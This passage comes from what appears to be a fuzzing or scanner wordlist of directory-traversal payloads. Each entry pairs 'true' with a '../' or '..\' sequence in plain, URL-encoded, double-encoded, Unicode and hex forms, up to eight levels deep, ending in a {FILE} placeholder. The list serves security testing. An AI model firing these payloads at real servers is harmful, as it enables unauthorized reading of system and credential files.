"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
